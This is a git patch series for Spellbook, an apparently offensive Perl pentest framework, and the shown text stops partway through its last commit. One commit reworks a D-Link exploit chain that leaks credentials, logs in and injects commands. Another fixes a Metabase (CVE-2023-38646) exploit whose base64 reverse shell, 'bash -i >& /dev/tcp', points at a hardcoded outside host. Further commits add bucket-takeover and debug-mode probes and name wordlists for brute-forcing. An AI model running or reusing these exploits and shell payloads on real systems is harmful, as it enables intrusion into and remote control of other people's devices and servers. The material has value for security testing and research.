From 44549721d54fc22fa54b71b99bbc7f9ab21c1fcf Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Sun, 16 Jun 2024 12:17:17 -0300 Subject: [PATCH 01/17] remove duplicate module --- .config/modules.json | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.config/modules.json b/.config/modules.json index 50f117f..041fc7c 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -377,12 +377,6 @@ "category": "advisory", "module": "CVE_2024_4577", "description": "PHP CGI Argument Injection vulnerability" - }, - { - "id": "0063", - "category": "advisory", - "module": "CVE_2021_41174", - "description": "Grafana Reflected XSS" } ] } \ No newline at end of file From e3dad4d1d12ba730fe1338c41ad82b149c92d067 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Sun, 16 Jun 2024 12:18:47 -0300 Subject: [PATCH 02/17] new module --- cpanfile | 1 + 1 file changed, 1 insertion(+) diff --git a/cpanfile b/cpanfile index b5d292b..660c142 100644 --- a/cpanfile +++ b/cpanfile @@ -7,3 +7,4 @@ requires "Net::DNS", "1.34"; requires "WWW::Mechanize", "2.11"; requires "Net::IP"; requires "UUID::Tiny", "1.04"; +requires "WWW::Mechanize"; \ No newline at end of file From 3e654b029f5a20d8648866db5ac17d12087b27c2 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Sun, 16 Jun 2024 12:19:18 -0300 Subject: [PATCH 03/17] fixes and more flexibility --- lib/Spellbook/Exploit/Fullchain_DLINK.pm | 81 ++++++++++++------------ 1 file changed, 39 insertions(+), 42 deletions(-) diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index e6cf014..e7d8540 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm @@ -4,66 +4,62 @@ package Spellbook::Exploit::Fullchain_DLINK { use HTTP::Request; use HTTP::Headers; use LWP::UserAgent; - use Spellbook::Recon::Shodan; + use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; sub new { my ($self, $parameters) = @_; - my ($help, $target, @results); + my ($help, $target, $payload, @results); Getopt::Long::GetOptionsFromArray ( $parameters, - "h|help" => \$help, - "t|target=s" => \$target + "h|help" => \$help, + "t|target=s" => \$target, + "p|payload=s" => \$payload ); if ($target) { - my @targets = Spellbook::Recon::Shodan -> new (["--target" => 1]); - - foreach my $router (@targets) { - my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $router]); + if ($target !~ /^http(s)?:\/\//x) { + $target = "http://$target"; + } - if ($credentials) { - my ($username, $password) = split /:/, $credentials; + my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); - if (!$password) { $password = "admin"; } + if ($credentials) { + my ($username, $password) = split /:/, $credentials; - if ($username) { - if ($router !~ /^http(s)?:\/\//x) { - $router = "http://$router"; - } + if (!$password) { + $password = "admin"; + } - my $userAgent = LWP::UserAgent->new(); - my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + if ($username) { + my $userAgent = LWP::UserAgent->new(); + my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - my $headers = HTTP::Headers->new ( - "Content-Type" => "application/x-www-form-urlencoded", - "Cookie" => "uid=dLktm5OJdn", - "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0", - "Accept" => "*/*", - "Accept-Language" => "en-US,en;q=0.5", - "Accept-Encoding" => "gzip, deflate", - "Origin" => "$router", - "Referer" => "$router/", - "Connection" => "keep-alive" - ); + my $headers = HTTP::Headers->new ( + "Content-Type" => "application/x-www-form-urlencoded", + "Cookie" => "uid=zwUEueUOvi", + "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0", "Accept" => "*/*", + "Accept-Language" => "en-US,en;q=0.5", + "Accept-Encoding" => "gzip, deflate", + "Origin" => $target, + "Referer" => $target, + "Connection" => "keep-alive" + ); - my $request = HTTP::Request -> new("POST", "$router/session.cgi", $headers, $payload); - my $response = $userAgent -> request($request); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); + my $response = $userAgent -> request($request); - if ($response -> is_success) { - my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ - "--target" => $router, - "--cookie" => "dLktm5OJdn", - "--payload" => "ping h4mm16zegmqhsuhuatu0j6ged5jw7nvc.oastify.com" - ]); + if ($response -> is_success) { + my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ + "--target" => $target, + "--cookie" => "zwUEueUOvi", + "--payload" => "uname -a" + ]); - if ($exploit[0] ne "Authenication fail") { - print "$router => $username / $password / dLktm5OJdn\n"; - - push @results, @exploit; - } + if ($exploit[0] ne "Authenication fail") { + push @results, @exploit; } } } @@ -77,7 +73,8 @@ package Spellbook::Exploit::Fullchain_DLINK { \rExploit::Fullchain_DLINK \r======================= \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + \r-t, --target Define a target + \r-p, --payload Send a command\n\n"; } return 0; From c07f2650e22da9d859cd7dbd8e929003c8ff55f9 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Wed, 19 Jun 2024 12:52:21 -0300 Subject: [PATCH 04/17] change name of the module --- .config/modules.json | 2 +- cpanfile | 3 +- lib/Spellbook/Recon/Technologies.pm | 50 ----------------------------- 3 files changed, 3 insertions(+), 52 deletions(-) delete mode 100644 lib/Spellbook/Recon/Technologies.pm diff --git a/.config/modules.json b/.config/modules.json index 041fc7c..225e9f8 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -285,7 +285,7 @@ { "id": "0048", "category": "recon", - "module": "Technologies", + "module": "Detect_Tech", "description": "Detect the stack of a web application" }, { diff --git a/cpanfile b/cpanfile index 660c142..2ac4f89 100644 --- a/cpanfile +++ b/cpanfile @@ -7,4 +7,5 @@ requires "Net::DNS", "1.34"; requires "WWW::Mechanize", "2.11"; requires "Net::IP"; requires "UUID::Tiny", "1.04"; -requires "WWW::Mechanize"; \ No newline at end of file +requires "WWW::Mechanize"; +requires "WWW::Wappalyzer"; \ No newline at end of file diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm deleted file mode 100644 index 578ca76..0000000 --- a/lib/Spellbook/Recon/Technologies.pm +++ /dev/null @@ -1,50 +0,0 @@ -package Spellbook::Recon::Technologies { - use strict; - use warnings; - use WWW::Wappalyzer; - use Spellbook::Core::UserAgent; - use List::Util 'pairmap'; - - sub new { - my ($self, $parameters) = @_; - my ($target, $help, @result); - - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target, - ); - - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; - } - - my $userAgent = Spellbook::Core::UserAgent -> new(); - my $request = $userAgent -> get($target); - my %headers_hash = pairmap { $a => [ $request -> headers -> header($a) ] } $request -> headers -> flatten; - my $wappalyzer = WWW::Wappalyzer -> new(); - - my %detected = $wappalyzer -> detect ( - html => $request -> decoded_content, - headers => \%headers_hash - ); - - @result = map { @$_ } values %detected; - - return @result; - } - - if ($help) { - return " - \rRecon::Detect_Tech - \r===================== - \r-t, --target Define the target - \r-h, --help See this menu\n\n"; - } - - return 1; - } -} - -1; \ No newline at end of file From e72e36d5d5ee515dca9095ae60c228a3b14dcc0c Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 11 Oct 2024 10:42:59 +0100 Subject: [PATCH 05/17] notes --- lib/Spellbook/Android/notes.txt | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 lib/Spellbook/Android/notes.txt diff --git a/lib/Spellbook/Android/notes.txt b/lib/Spellbook/Android/notes.txt new file mode 100644 index 0000000..50c0124 --- /dev/null +++ b/lib/Spellbook/Android/notes.txt @@ -0,0 +1,18 @@ +read the source code searching for insecure connections, like HTTP, WS, FTP, SMTP; +Search for private keys (criptography or simple secrets); + SECRET_KEY +LFI/ Private file access +Unprotected activities +Unprotected services +Intent redirection +Incorrect URL verification +Cross-app scripting +Deep link + - CSRF + - Open redirection + - XSS + - LFIs + +AndroidManifest.xml +- resources.arsc/strings.xml +- res/xml/file_paths.xml \ No newline at end of file From a4a96ff0ef7026da86baafa27ab9315ec357cab2 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Thu, 24 Oct 2024 20:45:30 +0100 Subject: [PATCH 06/17] add a new pattern to detect more cases --- lib/Spellbook/Exploit/S3_Bucket_Takeover.pm | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index f377321..2a353b1 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm @@ -15,13 +15,16 @@ package Spellbook::Exploit::S3_Bucket_Takeover { if ($target) { if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; + $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($target); - if ($request -> code() == 404 && $request-> content() =~ m/Code: NoSuchBucket/x) { + if ( + ($request -> code() == 404) && + (($request-> content() =~ m/Code: NoSuchBucket/x) || ($request-> content() =~ m/NoSuchBucket<\/Code>/x)) + ) { push @result, $target; } From 1d3c6a93facda8a0b4b912e5b2414177e29fdbb3 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Thu, 24 Oct 2024 21:34:39 +0100 Subject: [PATCH 07/17] draft module --- lib/Spellbook/Recon/Technologies.pm | 50 +++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 lib/Spellbook/Recon/Technologies.pm diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm new file mode 100644 index 0000000..0801727 --- /dev/null +++ b/lib/Spellbook/Recon/Technologies.pm @@ -0,0 +1,50 @@ +package Spellbook::Recon::Technologies { + use strict; + use warnings; + use WWW::Wappalyzer; + use Spellbook::Core::UserAgent; + use List::Util 'pairmap'; + + sub new { + my ($self, $parameters) = @_; + my ($target, $help, @result); + + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target, + ); + + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { + $target = "https://$target"; + } + + my $userAgent = Spellbook::Core::UserAgent -> new(); + my $request = $userAgent -> get($target); + my %headers_hash = pairmap { $a => [ $request -> headers -> header($a) ] } $request -> headers -> flatten; + my $wappalyzer = WWW::Wappalyzer -> new(); + + my %detected = $wappalyzer -> detect ( + html => $request -> decoded_content, + headers => \%headers_hash + ); + + @result = map { @$_ } values %detected; + + return @result; + } + + if ($help) { + return " + \rRecon::Detect_Tech + \r===================== + \r-t, --target Define the target + \r-h, --help See this menu\n\n"; + } + + return 1; + } +} + +1; From ba9d3e7cbe51c510eb78c8d3758c5480b538df75 Mon Sep 17 00:00:00 2001 From: Katashi Date: Fri, 25 Oct 2024 09:14:35 -0300 Subject: [PATCH 08/17] Add the new Django_DEBUG.pm file (#78) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Sync (#67) * new module to identify technologies from a web page * added https string * added trigger based on pull request * Add the new Django_DEBUG.pm file --------- Co-authored-by: Heitor Gouvêa --- lib/Spellbook/Exploit/Django_DEBUG.pm | 61 +++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100755 lib/Spellbook/Exploit/Django_DEBUG.pm diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm new file mode 100755 index 0000000..38d9040 --- /dev/null +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -0,0 +1,61 @@ +package Spellbook::Exploit::Django_DEBUG { + use strict; + use warnings; + use Spellbook::Core::UserAgent; + + sub new { + my ($self, $parameters) = @_; + my ($help, $target, @results); + + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target + ); + + if ($target){ + if ($target !~ /^http(s)?:\/\//){ + $target = "https://$target"; + } + + my $data = "foo=bar&instriq=io"; + + my $useragent = Spellbook::Core::UserAgent -> new (); + my @payloads = ( + "/instriqwashere", + "/api/instriqwashere", + "/api/v1/instriqwashere", + "/admin/instriqwashere", + "/admin/1" + ); + + foreach my $payload (@payloads) { + my $response = $useragent -> get($target . $payload); + + if ($response =~ /RuntimeError/) { + push @results, "$target has \"debug mode\" enabled! - [Method: GET]"; + } + + my $response_post = $useragent -> post($target . $payload, Content => $data); + + if ($response_post =~ /RuntimeError/) { + push @results, "$target has \"debug mode\" enabled! - [Method: POST]"; + } + } + + return @results + } + + if ($help) { + return (" + \rExploit::Django_DEBUG + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target"); + } + + return 0; + } +} + +1; \ No newline at end of file From be1fa74084c7765505a04cb5e1de4c05922b221a Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 13:33:12 +0100 Subject: [PATCH 09/17] update version --- README.md | 2 +- lib/Spellbook/Core/Helper.pm | 2 +- lib/Spellbook/Core/UserAgent.pm | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 08ded07..b9fd882 100755 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ - +
diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index d714970..a868698 100644 --- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -4,7 +4,7 @@ package Spellbook::Core::Helper { sub new { print " - \rSpellbook v0.3.4 + \rSpellbook v0.3.5 \rCore Commands \r============== \r\tCommand Description diff --git a/lib/Spellbook/Core/UserAgent.pm b/lib/Spellbook/Core/UserAgent.pm index 6111815..af21bc3 100644 --- a/lib/Spellbook/Core/UserAgent.pm +++ b/lib/Spellbook/Core/UserAgent.pm @@ -10,7 +10,7 @@ package Spellbook::Core::UserAgent { verify_hostname => 0, SSL_verify_mode => 0 }, - agent => "Spellbook / v0.3.4" + agent => "Spellbook / v0.3.5" ); $userAgent -> default_headers -> push_header("Cache-Control" => "no-cache"); From efa84374444fcde030877bdea8182231292ffd7f Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:01:14 +0100 Subject: [PATCH 10/17] fix code style and improve some parts --- .config/modules.json | 6 ++++ lib/Spellbook/Exploit/Django_DEBUG.pm | 40 ++++++++++----------------- 2 files changed, 21 insertions(+), 25 deletions(-) diff --git a/.config/modules.json b/.config/modules.json index 225e9f8..01222d4 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -377,6 +377,12 @@ "category": "advisory", "module": "CVE_2024_4577", "description": "PHP CGI Argument Injection vulnerability" + }, + { + "id": "0063", + "category": "exploit", + "module": "Django_Debug", + "description": "Detect if a Django application has the debug mode enabled" } ] } \ No newline at end of file diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 38d9040..2949057 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -1,7 +1,8 @@ -package Spellbook::Exploit::Django_DEBUG { +package Spellbook::Exploit::Django_Debug { use strict; use warnings; use Spellbook::Core::UserAgent; + use Spellbook::Helper::Generate_UUID; sub new { my ($self, $parameters) = @_; @@ -15,31 +16,20 @@ package Spellbook::Exploit::Django_DEBUG { if ($target){ if ($target !~ /^http(s)?:\/\//){ - $target = "https://$target"; + $target = "https://$target"; } - my $data = "foo=bar&instriq=io"; + my $useragent = Spellbook::Core::UserAgent -> new(); + my @paths = ("/genericpath", "/api/spellbook", "/api/v1/spellbook", "/admin/spellbook", "/admin/1"); + my @method = ("get", "post"); - my $useragent = Spellbook::Core::UserAgent -> new (); - my @payloads = ( - "/instriqwashere", - "/api/instriqwashere", - "/api/v1/instriqwashere", - "/admin/instriqwashere", - "/admin/1" - ); + foreach my $payload (@paths) { + foreach my $method (@method) { + my $response = $useragent -> $method ($target . $payload); - foreach my $payload (@payloads) { - my $response = $useragent -> get($target . $payload); - - if ($response =~ /RuntimeError/) { - push @results, "$target has \"debug mode\" enabled! - [Method: GET]"; - } - - my $response_post = $useragent -> post($target . $payload, Content => $data); - - if ($response_post =~ /RuntimeError/) { - push @results, "$target has \"debug mode\" enabled! - [Method: POST]"; + if ($response =~ /RuntimeError/) { + push @results, "$target has \"debug mode\" enabled! - [Method: $method]"; + } } } @@ -47,11 +37,11 @@ package Spellbook::Exploit::Django_DEBUG { } if ($help) { - return (" - \rExploit::Django_DEBUG + return " + \rExploit::Django_Debug \r======================= \r-h, --help See this menu - \r-t, --target Define a target"); + \r-t, --target Define a target"; } return 0; From 7b4fb8f5a8b2cef64203b87b4ef5cf44159bb957 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:07:34 +0100 Subject: [PATCH 11/17] fix reverse shell payload --- lib/Spellbook/Advisory/CVE_2023_38646.pm | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 827cb27..2660ce3 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm @@ -9,7 +9,10 @@ package Spellbook::Advisory::CVE_2023_38646 { sub new { my ($self, $parameters) = @_; - my ($help, $target, $remote, $port, @result); + my ($help, $target, @result); + + my $remote = 'lesis.lat'; + my $port = 1337; Getopt::Long::GetOptionsFromArray ( $parameters, @@ -34,7 +37,7 @@ package Spellbook::Advisory::CVE_2023_38646 { if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); - my $reverse = encode_base64("bash -i >&/dev/tcp/$remote/$port 0>&1", ""); + my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); my $payload = qq({ "token": "$token", @@ -60,7 +63,7 @@ package Spellbook::Advisory::CVE_2023_38646 { my $response = $userAgent -> request($request); if ($response -> code() == 400) { - push @result, $target; + push @result, "\n[+] $target exploited\n"; } } } From 41bd7471f370835fb7c73806f918bf10021274c4 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:13:55 +0100 Subject: [PATCH 12/17] new wordlists --- files/top100-brazilian-lastnames.txt | 100 +++++++++++++ files/top210-brazilian-names.txt | 210 +++++++++++++++++++++++++++ 2 files changed, 310 insertions(+) create mode 100644 files/top100-brazilian-lastnames.txt create mode 100644 files/top210-brazilian-names.txt diff --git a/files/top100-brazilian-lastnames.txt b/files/top100-brazilian-lastnames.txt new file mode 100644 index 0000000..a36a262 --- /dev/null +++ b/files/top100-brazilian-lastnames.txt @@ -0,0 +1,100 @@ +silva +santos +oliveira +souza +lima +almeida +costa +pereira +rodrigues +ferreira +carvalho +gomes +ribeiro +martins +alves +rocha +dias +martins +almeida +mendes +pires +barros +ferreira +nascimento +correia +teixeira +mendes +lima +cardoso +andrade +ferreira +monteiro +ribeiro +martins +nunes +castro +azevedo +mendes +santos +barreto +vieira +tavares +matos +frança +figueiredo +maia +paiva +brito +rios +araújo +santos +cunha +queiroz +neves +lemos +gomes +ribeiro +teles +lima +silva +barros +martins +moura +rocha +almeida +oliveira +costa +dias +lopes +pacheco +salgado +martins +rocha +oliveira +lima +campos +araújo +cunha +teixeira +almeida +leite +ribeiro +lopes +macedo +moreira +pinto +lima +pires +queiroz +santos +brito +oliveira +cardoso +andrade +martins +soares +nascimento +cordeiro +faria +nascimento \ No newline at end of file diff --git a/files/top210-brazilian-names.txt b/files/top210-brazilian-names.txt new file mode 100644 index 0000000..3a4d871 --- /dev/null +++ b/files/top210-brazilian-names.txt @@ -0,0 +1,210 @@ +adriana +adriano +alan +alana +alanys +alessandra +alessandro +alice +aline +amanda +amaro +ana +ana beatriz +ana clara +anderson +andre +andrea +angela +antonia +arthur +beatriz +betania +beto +bianca +brenda +bruna +bruno +caio +camila +carla +carlos +carol +caroline +cecilia +cintia +clara +claudia +claudio +cleber +cleusa +cora +cristiano +daiane +daniel +daniela +daniele +daniella +danilo +davi +debora +denise +diego +douglas +edson +elaine +elena +eliane +elias +elisa +eloisa +emilly +emily +erika +evandro +evelyn +fabiana +fabio +fagner +felipe +fernanda +fernando +flavia +flavio +francisco +gabriel +gabriele +giovanna +giovanni +giselle +guilherme +gustavo +heitor +helena +igor +isabella +ivan +ivete +jaime +jamil +janaina +janderson +jaqueline +jessica +joana +joao +joão pedro +joel +joelma +jorge +jose +julia +julian +juliana +juliane +juliano +julio +junior +karla +katia +kelly +lais +lara +larissa +laura +leandro +leila +leticia +liana +luan +luana +lucas +luciana +luis +luiz +maiara +maicon +maira +marcelo +marcia +marcio +marcos +maria +mariana +mariane +matheus +mauricio +michelle +mikael +miranda +miriam +murilo +nadja +nascimento +nátaly +natasha +nathalia +nicolas +nicoly +nilson +orlando +otavio +patricia +paula +paulo +pedro +priscila +rafael +rafaela +raquel +raul +regina +renan +renata +renato +ricardo +rita +roberta +roberto +robson +rodolfo +rodrigo +ronaldo +roni +rony +rosaline +ruan +ruy +sabrina +samanta +samara +sandro +sergio +sheila +simone +sofia +sonia +tainara +tais +talita +tamires +tânia +tatiane +thais +thiago +thierry +tiago +tomas +valentina +valeria +vanessa +vera +veronica +victor +victoria +vinicius +vivian +viviane +wellington +willian +heverton \ No newline at end of file From 6af14b764aa8adac1408d7073125bec7393c09d3 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:54:39 +0100 Subject: [PATCH 13/17] update version --- README.md | 4 ++-- lib/Spellbook/Core/Helper.pm | 2 +- lib/Spellbook/Core/UserAgent.pm | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index b9fd882..f123b5e 100755 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ - +
@@ -44,7 +44,7 @@ $ cpanm --installdeps . ### How to use ``` -Spellbook v0.3.3 +Spellbook v0.3.6 Core Commands ============== Command Description diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index a868698..f50f568 100644 --- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -4,7 +4,7 @@ package Spellbook::Core::Helper { sub new { print " - \rSpellbook v0.3.5 + \rSpellbook v0.3.6 \rCore Commands \r============== \r\tCommand Description diff --git a/lib/Spellbook/Core/UserAgent.pm b/lib/Spellbook/Core/UserAgent.pm index af21bc3..d4548d7 100644 --- a/lib/Spellbook/Core/UserAgent.pm +++ b/lib/Spellbook/Core/UserAgent.pm @@ -10,7 +10,7 @@ package Spellbook::Core::UserAgent { verify_hostname => 0, SSL_verify_mode => 0 }, - agent => "Spellbook / v0.3.5" + agent => "Spellbook / v0.3.6" ); $userAgent -> default_headers -> push_header("Cache-Control" => "no-cache"); From 9fe48d11bd713949efb8ec157a216b07f67db2b5 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:55:15 +0100 Subject: [PATCH 14/17] change email --- SECURITY.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SECURITY.md b/SECURITY.md index 33340dd..d1758e0 100755 --- a/SECURITY.md +++ b/SECURITY.md @@ -1,6 +1,6 @@ # Security Policy -If you find a security issue, please DO NOT submit it via the issue tracker! Instead, please follow responsible disclosure practices and send information about security issues directly to [hi@heitorgouvea.me](mailto:hi@heitorgouvea.me) so that a proper assessment can be made and a fix prepared before a wide announcement. You will receive an acknowledgement within 24 hours. +If you find a security issue, please DO NOT submit it via the issue tracker! Instead, please follow responsible disclosure practices and send information about security issues directly to [security@heitorgouvea.me](mailto:security@heitorgouvea.me) so that a proper assessment can be made and a fix prepared before a wide announcement. You will receive an acknowledgement within 24 hours. Even in cases where you have limited or incomplete information, or you're not sure whether or not a problem constitutes a security issue, please make contact as soon as possible. We can work together to investigate, debug, and assess. From 5c63cf25475643dc177926a22a91b94c412e3dd4 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 16:02:13 +0100 Subject: [PATCH 15/17] rename module --- .config/modules.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/.config/modules.json b/.config/modules.json index 01222d4..cfae08e 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -383,6 +383,12 @@ "category": "exploit", "module": "Django_Debug", "description": "Detect if a Django application has the debug mode enabled" + }, + { + "id": "0064", + "category": "recon", + "module": "Technologies", + "description": "Use wappalyzer to detect technologies from a website" } ] } \ No newline at end of file From dcac3a4215c1b538cf36f4ac50ee416ed2728569 Mon Sep 17 00:00:00 2001 From: priv <140729444+scriptprivate@users.noreply.github.com> Date: Tue, 12 Nov 2024 10:59:22 -0300 Subject: [PATCH 16/17] address linter warnings (#113) --- lib/Spellbook/Advisory/CVE_2006_3392.pm | 27 +++-- lib/Spellbook/Advisory/CVE_2016_10045.pm | 27 +++-- lib/Spellbook/Advisory/CVE_2017_5487.pm | 25 +++-- lib/Spellbook/Advisory/CVE_2020_9376.pm | 17 +-- lib/Spellbook/Advisory/CVE_2020_9377.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2021_24891.pm | 15 ++- lib/Spellbook/Advisory/CVE_2021_41773.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2023_29489.pm | 21 ++-- lib/Spellbook/Advisory/CVE_2023_38646.pm | 35 +++--- lib/Spellbook/Advisory/CVE_2024_4040.pm | 33 +++--- .../Advisory/Laravel_Ignition_XSS.pm | 19 ++-- lib/Spellbook/Android/APKSign.pm | 19 ++-- lib/Spellbook/Android/Manifest.pm | 28 +++-- lib/Spellbook/Android/Strings.pm | 13 ++- lib/Spellbook/Bruteforce/Facebook.pm | 15 ++- lib/Spellbook/Bruteforce/Instagram.pm | 17 +-- .../Bruteforce/{Linkedin.pm => LinkedIn.pm} | 15 ++- lib/Spellbook/Bruteforce/SMTP.pm | 13 ++- lib/Spellbook/Bruteforce/Twitter.pm | 15 ++- lib/Spellbook/Bruteforce/Wordpress.pm | 21 ++-- lib/Spellbook/Core/Credentials.pm | 21 ++-- lib/Spellbook/Core/Helper.pm | 23 ++-- lib/Spellbook/Core/Module.pm | 27 +++-- lib/Spellbook/Core/Orchestrator.pm | 33 +++--- lib/Spellbook/Exploit/CORS_Misconfig.pm | 19 ++-- lib/Spellbook/Exploit/DataBreach.pm | 17 +-- lib/Spellbook/Exploit/Django_DEBUG.pm | 19 ++-- lib/Spellbook/Exploit/Fullchain_DLINK.pm | 35 +++--- lib/Spellbook/Exploit/HAProxy_Exposed.pm | 17 +-- lib/Spellbook/Exploit/Headers_Misconfig.pm | 17 +-- lib/Spellbook/Exploit/Mixed_Content.pm | 26 +++-- lib/Spellbook/Exploit/None_Attack.pm | 17 +-- lib/Spellbook/Exploit/Pwn_DB.pm | 22 ++-- lib/Spellbook/Exploit/Redis_Unauth.pm | 23 ++-- lib/Spellbook/Exploit/Reflected_XSS.pm | 17 +-- lib/Spellbook/Exploit/S3_Bucket_Takeover.pm | 17 +-- lib/Spellbook/Exploit/Shellshock.pm | 17 +-- lib/Spellbook/Exploit/Subdomain_Takeover.pm | 104 +++++++++--------- lib/Spellbook/Exploit/Swagger_XSS.pm | 98 ++++++++--------- lib/Spellbook/Exploit/Upload_Via_PUT.pm | 15 ++- lib/Spellbook/Helper/CDN_Checker.pm | 74 ++++++------- lib/Spellbook/Helper/Exifs_Write.pm | 15 ++- lib/Spellbook/Helper/Generate_UUID.pm | 19 ++-- lib/Spellbook/Helper/Host_Normalization.pm | 15 ++- lib/Spellbook/Helper/Permutations.pm | 21 ++-- lib/Spellbook/Helper/Read_File.pm | 41 +++---- lib/Spellbook/Helper/Reverse_Shell.pm | 21 ++-- lib/Spellbook/Helper/Scope.pm | 29 ++--- lib/Spellbook/Helper/Uniq.pm | 13 ++- lib/Spellbook/Parser/Nmap.pm | 23 ++-- lib/Spellbook/Parser/Nozaki.pm | 13 ++- lib/Spellbook/Parser/S3_Bucket.pm | 21 ++-- lib/Spellbook/Parser/Sitemap.pm | 17 +-- lib/Spellbook/Platform/HackerOne.pm | 19 ++-- lib/Spellbook/Platform/Intigriti.pm | 11 +- lib/Spellbook/Recon/DNS_Bruteforce.pm | 19 ++-- lib/Spellbook/Recon/Detect_Error.pm | 17 +-- lib/Spellbook/Recon/Dorking.pm | 12 +- lib/Spellbook/Recon/Extract_Links.pm | 23 ++-- lib/Spellbook/Recon/Find_Emails.pm | 15 ++- lib/Spellbook/Recon/Get_IP.pm | 15 ++- lib/Spellbook/Recon/HTTP_Probe.pm | 17 +-- lib/Spellbook/Recon/HaveBeenPwned.pm | 15 ++- lib/Spellbook/Recon/Host_Resolv.pm | 17 +-- lib/Spellbook/Recon/Internal_DNS.pm | 13 ++- lib/Spellbook/Recon/Masscan.pm | 33 +++--- lib/Spellbook/Recon/Nmap_Scanner.pm | 29 ++--- lib/Spellbook/Recon/Query_Shodan.pm | 15 ++- lib/Spellbook/Recon/Shodan_Enumeration.pm | 15 ++- lib/Spellbook/Recon/Subdomain_Enumeration.pm | 17 +-- lib/Spellbook/Recon/Technologies.pm | 15 ++- lib/Spellbook/Recon/WayBackUrls.pm | 19 ++-- spellbook.pl | 4 +- 73 files changed, 942 insertions(+), 725 deletions(-) rename 